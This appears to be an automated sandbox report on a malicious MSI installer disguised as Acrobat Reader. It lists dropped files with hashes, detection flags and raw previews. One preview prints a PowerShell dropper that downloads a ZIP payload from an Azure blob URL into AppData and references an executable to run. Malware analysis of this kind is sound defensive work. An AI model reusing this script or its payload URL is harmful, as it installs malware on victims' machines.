Preview:	..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\scr43E3.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1214
Entropy (8bit):	3.603911392112435
Encrypted:	false
SSDEEP:	24:Q9J97PSeKV0rB1lSKfilUx2yaUx6FXSCixpJDJWQ1UMkWkCCNiDo:2JVU0VnSKql42ya4QXSvxpV1HcCNDo
MD5:	A5DF3BCD6EB76F639B5FEB3E8B68B3DB
SHA1:	F798930D1803B8768244F7ACAD963E6620ECAE7F
SHA-256:	41D352C568B73B9EDBAB8736EE387D3EFE15F2693ABB58FFC13361706E8ABC64
SHA-512:	58567B3663C2978C34DA805CBF847A9CA20299BAA999411A3317FD0DE475F8A8D0A6C4E08070B249B46234A46C6634918AA67208319990EA3FD0B6ABACAD2F9F
Malicious:	true
Preview:	..$.u.r.l. .=. .".h.t.t.p.s.:././.b.o.s.t...b.l.o.b...c.o.r.e...w.i.n.d.o.w.s...n.e.t./.2.2.0.5.t.o.m.p.s./.b.a.s.t.a.o.d.o.r.e.i...m.l.k.".....$.d.o.w.n.l.o.a.d.D.i.r. .=. .".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.a.p.p.D.a.t.a.".....$.d.a.t.e. .=. .G.e.t.-.D.a.t.e. .-.F.o.r.m.a.t. .".d.d.M.M.y.y.y.y.".....$.o.u.t.F.i.l.e. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.$.d.a.t.e...z.i.p.".....$.e.x.e.c.u.t.a.b.l.e.P.a.t.h. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.W.e.b.E.x.p.e.r.i.e.n.c.e.H.o.s.t.A.p.p...e.x.e.".........f.u.n.c.t.i.o.n. .D.o.w.n.l.o.a.d. .{..... . . . .p.a.r.a.m.(.$.u.r.l.,. .$.o.u.t.p.u.t.)..... . . . .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.u.r.l.,. .$.o.u.t.p.u.t.).....}.........D.o.w.n.l.o.a.d. .-.u.r.l. .$.u.r.l. .-.o.u.t.p.u.t. .$.o.u.t.F.i.l.e.........i.f. .(.T.e.s.t.-.P.a.t.h. .$.o.u.t.F.i.l.e.). .{..... . . . .W.r.i.t.e.-.H.o.s.t. .".A.r.q.u.i.v.o. .Z.I.P. .b.a.i.x.a.d.o. .c.o.m. .s.u.c.e.s.s.o.!.".....

C:\Users\user\AppData\Local\appData\24052024.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	34981272
Entropy (8bit):	7.998720224310873
Encrypted:	true
SSDEEP:	786432:3NDIAPZ7GQw4tH/2eBwlcB+f7KR50u94+Vhd0oiaDE281cfun:3NDIG7Ghy/2avoeRjiaSGun
MD5:	0394BF352D19CABF194A53EAC82F93E1
SHA1:	35E74112EB76D30FED157D5D26AA438B35ADE577
SHA-256:	4386BC25FBD4BE0FFA13D544FAD0A81D8117FAABC73E40CD44708A3CC6E27BAC
SHA-512:	23197FF01BD4CF78AB5ED99A312C39C257DFD95C18EAAB4103EF2E03EF5E5795C909A2A083B68DFA0A77011CFF14705AF91F4564846DDA4A81CF692516CE07B3
Malicious:	true
Preview:	D_.........j.L................W\|f{yq;Uddx}wu`}{z;D_........YR.L............6...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;D_...........L............-...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;%& :$:"'"#:%%-:yuz}rqg`y....$.P.2....<..R.......y\|.y].....Yr.. ...z..:]J\|....HY.....E..%A..].S....\|.l.T......\|"...YH..-.$...mABS:.y...... ..eq...y8h......B...!.p.M..D_........\..L.H......4.>.8...W\|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;w\|f{yq:qlq.mL...,......TT%....8..&U...........!.RgI..<J..'<Ys....o.m..I..\|.$..r..r.2...eUY...A....j..i....`..g....G........4.EV....k.=..:).b.B.h.N...Y.e.`G]..._..vn...G..Y..#....2Y!.... q.w...VE.4(.4Z...!5..Q\..S`...........PU$......U....J.Q#E1....J...V-[#.'.;l.k.\...aZj...1......um.d......=...z.............}V.H_`)...6-Y<...c.....+i....d.~..4....u..i^.o..4h..J.T......W..........3@..N.:.C..s..VI.........;..,..k.n.V.H..;.C..J&m..$.....d.w*..w.(.......K...Dp. a. ........S.a..T4{O..ZKX..3[....{.%..4`....X......)......J....(.p.qWTD.#J.......7S...

C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	5.776679906561504
Encrypted:	false
SSDEEP:	1536:11fhFN4g5OkVtgaUFAUoBMmDxdgUhpzz:1RhL5RAFADTxzz
MD5:	53AB9B8198E8AD8D3A043F40E72B1AB1
SHA1:	51F27E895808A806D2EA7F22CD91C50C4C7CDF5F
SHA-256:	1E9CD852EF2E7233E12090ED41BA99019D533CC07EDADFE5095CD0DDACC4FC1E
SHA-512:	7A7FE0BA46A92D0A5CE8A1ABFBEE97BA8F5EA3A7F8898D1DE6024ECC3C3209F159FB76B11B08B7ECAA6F152DEE974BD68316A06485E8CA6EE14EBC8C63DBC6FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a.r.2.r.2.r.2U..3.r.2U..3.r.2U..3.r.2U..3.r.2..d2.r.2.r.2.r.2...3.r.2...2.r.2...3.r.2Rich.r.2................PE..d...Gg.d.........."..........Z.................@............................. ......@\....`............................................................................................p...............................8............................................text...\........................... ..`.rdata...8.......:..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\mrt100_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258736
Entropy (8bit):	6.781393000027508
Encrypted:	false
SSDEEP:	6144:tn/Hw5J0LRoPdtX6NWhBAUMXHuOCmu9XIGR:1QL0LsoW4UMXHuOcB
MD5:	3CDF5CBDBC53E82C799F76DA8F91BDD9
SHA1:	C8F4A3617C4F0BEF70455AB53010F6340BBE5F57
SHA-256:	597D19BAEE0EF83E312A807B7004CB7324336F0B558DA48CE44A299B60362136
SHA-512:	6E9826AD7373998581E5C2B7A0BEA6DEDF79130878304A0B22168BBA88165518E810D9F93D82F7285F9E35C89BAC60D1D25F6218B1636C7B64AFB24D5FE058D7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J......Z...Z...Z)G.[...Z)G.[...Z)G.[...Z)G.[...Z..`Z...Z.f=Z!..Z.LsZ...Z...ZS..Z...Z...Z.G.[...Z.G.[<..Z.G.[...Z.GQZ...Z.G.[...ZRich...Z........PE..L...g7.V.........."!.....\...T......@........p............................... ......0.....@Q........................`>...+...............................>......p/...@..T...................tA.......A..\....................=..@....................text...OZ.......\.................. ..`.data...@6...p.......`..............@....idata..~............h..............@..@.didat...............x..............@....tls....u............z..............@....rsrc................\|..............@..@.reloc..p/.......0..................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\msvcp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571168
Entropy (8bit):	6.509615420946833
Encrypted:	false
SSDEEP:	12288:tZeEtnsE9Diw9NF9WPz81b5q1ilJpr8hpEygKlvwWAIQEKZm+jWodEEVTJd34/:tZe6yg7LIQEKZm+jWodEEJJdc
MD5:	15DD460E592E59C2CE7F553328739DFC
SHA1:	BA2BAB7649C7FBC18E3FF38B71368839A5588657
SHA-256:	F7F46F09AA38B6FAA5DBFD2B192EB9A5D63E9D5EEC482624FC20E6686F59098D
SHA-512:	31330DB59F930C4E2923074FFC6ED051D68916B3F7EFD09EDD11B7E51A0F58BB6DDC576F306FF2195E717A1B5B44316A3A7B11FE4C9E17BEC255EA8E8068F0DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P.p.1h#.1h#.1h#.I.#.1h#.1i#91h#,Fi".1h#,Fl".1h#,Fk".1h#,Fm".1h#,Fh".1h#,F.#.1h#,Fj".1h#Rich.1h#........................PE..d.....Za.........." .....@...X......./..............................................=T....`Q.........................................4..@...@................p...9...... 7......0......T...........................0...8............P...............................text....>.......@.................. ..`.rdata..D....P.......D..............@..@.data... 9...0......................@....pdata...9...p...:...8..............@..@.rsrc................r..............@..@.reloc..0............v..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcamp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	397664
Entropy (8bit):	6.3562644384745655
Encrypted:	false
SSDEEP:	6144:9fLtIx4FFDinA8Jh9XFHG/s9yrFp28s0C0KJ9fBIv9wCOfeC61S9HIl:xi6FFDaA+XVG/s9yrFpBGJtKwCJeIl
MD5:	71B3CACB316C4AEDDC8CE2D82FEA307A
SHA1:	883D5ACD1E14C85C1BA7B793F74E03C0FACD0684
SHA-256:	8768E0E8C9BD1670D7896E2968E70810AF822B461439DE7453B2E5873BFB3A00
SHA-512:	274424A039919DFC5510462D9D129550DB5D5BED1C735496D24CAC96EE1DE798BDB1DD832804DEEBD81307DCF1D6A778275262BC7F6E9E498AB1F751CAA20BBB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,h..h...h...h....y..n....fw.j...aq..H...h........~..a....~..s....~..`....~..l....~..d....~..i....~u.i...h...i....~..i...Richh...........................PE..d.....Za.........." .........B......0A.......................................0......Y.....`Q........................................0...08..`P..........`$.......5......`1... ..(...\|#..T....................%..(....#..8............................................text............................... ..`.rdata..............................@..@.data...X3...p...,...P..............@....pdata...5.......6...\|..............@..@.rsrc...`$.......&..................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vccorlib140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	333088
Entropy (8bit):	5.973829257868023
Encrypted:	false
SSDEEP:	6144:Azdy9XA1tDhdU+XbrzZSW1t9o7VUI0ltsT:Ao9W3dPXb4SHoKts
MD5:	900E194755EE739953D15C29E7E692E9
SHA1:	1DE7533C302EABA2CE0D5C09204228522824B723
SHA-256:	594BABC5ED05826AAF2AEC0750BE135EFF2876C9B941D2E99B6B1E278073C96A
SHA-512:	3DD25BD5EC4746A74A14B399A469B0C7ACEC0BC9222800841AFF6E92616D2FBB43DDB2FB7F5EE33D58FED45A00CF8B4931B04D4C07699BD30F1780E9D82BB6A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5..q...q...q...x...]...q..........v......k......y......u......`......p.....v.p......p...Richq...........PE..d.....Za.........." .....t...v.......s....................................... ............`Q.............................................>.............................. /..............T...............................8............................................text...vs.......t.................. ..`.rdata..l............x..............@..@.data........ ......................@....pdata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcomp140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61960
Entropy (8bit):	6.313785957582955
Encrypted:	false
SSDEEP:	1536:FzxzJ+xpDMmwsLMFD0WfLSxwKoUhw/1Yd5ZkD:FzxzJQpDHwQMFD0WuwKoUG/i2D
MD5:	E3FC37B45BA6D33AFACC2B26F935D442
SHA1:	805241C0C6AE7745A2CEBDFE8F8FABA3E5EAA0FA
SHA-256:	1187781D8AE000F52FDD0B1F69C46EE680CE18CC8934D107CB96456CDDC0B737
SHA-512:	3E63CDD375644A77C5951CD087443688C2F7573D6DB3BCE28600DB89F86E398C693B0B6EB24ABF96FD50162265D184B8CCA4AC74A7E5222CB0FB2D1B50B66D4C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)c..)c..)c.. ...1c..)c...c......*c......,c....../c......,c......'c......(c....{.(c......(c..Rich)c..................PE..d.....Za.........." .....x...`.......b....................................... ......[.....`Q........................................@..........................(........&......$.......T...............................8............................................text....w.......x.................. ..`.rdata..n........0...\|..............@..@.data...............................@....pdata..(...........................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18710528
Entropy (8bit):	6.181623444366951
Encrypted:	false
SSDEEP:	98304:ld0f3+jdK2L3RqLbgjuwfTaYrF0uevJpFXflizzJh:4f3qdTrgLbga0TaYpcXfm
MD5:	86CA1E8ADD67041FEC9CD6CE7094796B
SHA1:	59119C356B7E6FA0CE6433CD7CB3D5CA1AB3A522
SHA-256:	0533F9AA57125AEF7C2D5384FA97BF82D4EB6A70BBD02623B04A3742299CEA5E
SHA-512:	237AC6AF6C17EC6BB62BB0FAD0F7A7877692B39A05D9E4A41AFF464F86B7542C5A7A8E044183E8784CA8A85EA830DE5E608BB31EFD56462FC554340A26139C30
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....CNf.........." ..........\..............@............................... ...........`.......................... ..........................2S.......L7........................................................................................................text............................... ..`.data...............................@....bss.....)...P...........................idata..2S.......T...>..............@....didata............................@....edata...............,..............@..@.rdata..E...........................@..@.reloc...............0..............@..B.pdata...............$..............@..@.rsrc....L7......L7..4..............@..@.............. .....................@..@........................................

C:\Users\user\AppData\Local\appData\vcruntime140_app.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	97632
Entropy (8bit):	6.409755640490607
Encrypted:	false
SSDEEP:	1536:upMm/eng35aehvWy3YevkYdmBaNBkKh8ehNK7TT0ecbe+4Z9Vvl:u2W9Lv9dVN1h8eLK7TwecbeVZDN
MD5:	27F73C8DAA6DF0A0769FBC0F28D2E955
SHA1:	A4FD3745C70C8C10D0DCCB9E2B56786D58BA7049
SHA-256:	FFF797E284CC21447515C478D1F97B89EFB2A49A6CCEF7D7F94B4DF76B5789DF
SHA-512:	B9A0823E42A57187838D5B10C169E2CC3A586AC92EAB82E4F915A83623131BA23E6D43C01E2356995AB7A94414DBB58D104BCC7966E5A5FC321F3EBD6CBD3663
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F..~...~...~......~.......~.}.}...~.}.z...~.}.{...~.}.~...~.}.....~.}.\|...~.Rich..~.........................PE..d.....Za.........." .........b............................................................`Q........................................`A..8....I..,............p.......V..`'..........(+..T............................+..8...............h............................text............................... ..`.rdata..D@.......B..................@..@.data........`.......<..............@....pdata.......p.......@..............@..@_RDATA...............L..............@..@.rsrc................N..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\appData\xmpp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3368448
Entropy (8bit):	6.58875247712544
Encrypted:	false
SSDEEP:	49152:iyzKWtMzxfan/FkSvzCrcGJWABcHHjQHBK9398:iy2cMzdmtChWm
MD5:	A01B09B6D27D101391AAB54AC0879E5B
SHA1:	E36B768ABC97F755161B0112B01D6644F8DB5C60
SHA-256:	ED4D6FDB6248BCFF64E5652CD0C9D79C483BACE94C1120DC3128645F00A5E5C4
SHA-512:	3311BBA5F38A83B03744744A38EF52564584CDB752D0C96A1CD0ED36AB1BBEBD9695FCDD7B17E9D1559402552972685F4FA5E0BEDCE92ACE5A872DF047A2CF31
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...3Hl`.................z(..........(.......(...@.......................... <..................@....................1......p1..=....5.......................1...............................1.....................p{1.\|.....1.@....................text....Y(......Z(................. ..`.itext.......p(.. ...^(............. ..`.data....n....(..p...~(.............@....bss.....n....)..........................idata...=...p1..>....(.............@....didata.@.....1......,).............@....edata........1......8).............@..@.tls....L.....1..........................rdata..].....1......:).............@..@.reloc........1......<).............@..B.rsrc.........5.......,.............@..@............. <......f3.............@..@................

C:\Windows\Installer\4b3b27.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2DB5220B-06B7-4340-8D25-6BB9D51802F1}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed May 22 20:11:17 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	9782272
Entropy (8bit):	7.8856938835516495
Encrypted:	false
SSDEEP:	196608:r/i0OAYet5vLXFZf6eB1No6Zd4vvrm89UcP7fbUDd57U8:Ti0OAY+N5ZfHB16RHrm8VT6Q
MD5:	DC2FF54F9664F90F09004B367FBDCA10
SHA1:	E0DD52A75514BAE7E68396E953EAB1A62E567AA5
SHA-256:	0CC32738DD2DBF5D0C128A9029783B6DAA691C999683FEAE8B9CAA4C0805EAAD
SHA-512:	3032476F1E6511371322C79FFF6A45CCB5CC3C79A01DB470F1C3C207E3557272B7F1B306218AF46BC96CAE243DA843DAE5F1006DFF5E225E0D1DEEC3C552FCF5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\4b3b27.msi, Author: Joe Security Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\4b3b27.msi, Author: Joe Security
Preview:	......................>.......................................................F.......b.......t.......................................s...............................................~...................................................................................................................................................................................................................................................................................................................................................................#...4........................................................................................... ...!..."...-...2...%...&...'...(...)...*...+...,.........../...0...1...5...3...<...?...6...7...8...9...:...;...E...=...>.......@...A...B...C...D...............H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI3CCD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3D2C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3D4C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3D6C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3DBC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3E49.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	672798
Entropy (8bit):	6.593514509531593
Encrypted:	false
SSDEEP:	12288:FurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgk:UihNREtRdYndJP32R7vKG+47/L025zEQ
MD5:	CE0FFA4DB8384BF5289CF1C7F20CE1E7
SHA1:	2FFF5A6D45F7BFC2EF2C0975305A519E2A45BD37
SHA-256:	C48A27BC44D5DF6EA604925C0EEE5A858AAABF3CAE3FC7A83E011B1884CE8BF2
SHA-512:	A511E14DF98BEDC83EC48DC908F8C8F9ACC7D7649E82A09ADE53F5CFA687786CB0AA9D9FDE9C9F6AAEABFCBA7B9A8882C6A60D64978ADAEE1475647B8FA2DC57
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\MSI3E49.tmp, Author: Joe Security
